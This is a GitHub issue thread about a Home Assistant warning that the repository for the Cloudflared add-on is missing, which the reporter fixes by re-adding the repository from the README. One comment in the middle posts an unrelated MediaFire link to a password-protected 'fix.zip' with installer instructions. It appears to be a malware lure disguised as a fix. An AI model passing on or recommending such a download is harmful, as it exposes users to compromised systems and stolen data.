### ISSUE TITLE
Home assistant showing warning: Repository for add-on Cloudflared is missing

### ISSUE THREAD

**Issue by zaped212** [brenner-tobias/addon-cloudflared#698]
### The problem

I recently noticed that my home assistant install is getting the following warning:

`=======================================================
Missing repository for an installed add-on

Repository for add-on Cloudflared is missing. This means it will not get updates, and backups may not be restored correctly as the supervisor may not be able to build/download the resources required.

Please check the [add-on's documentation](https://lakehass.rrindustries.us/hassio/addon/9074a9fa_cloudflared) for installation instructions and add the repository to the store.
=======================================================`

### What version of Cloudflared has the issue?

Current version: 1.0.4

### What type of installation are you running?

Home Assistant OS

### Steps to reproduce the issue

Issue shows up under the settings -> repairs

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zaped212** [comment]
was able to solve this by re-adding the repo used for the addon to home assistant.
Just follow the install steps to add the repo from the README
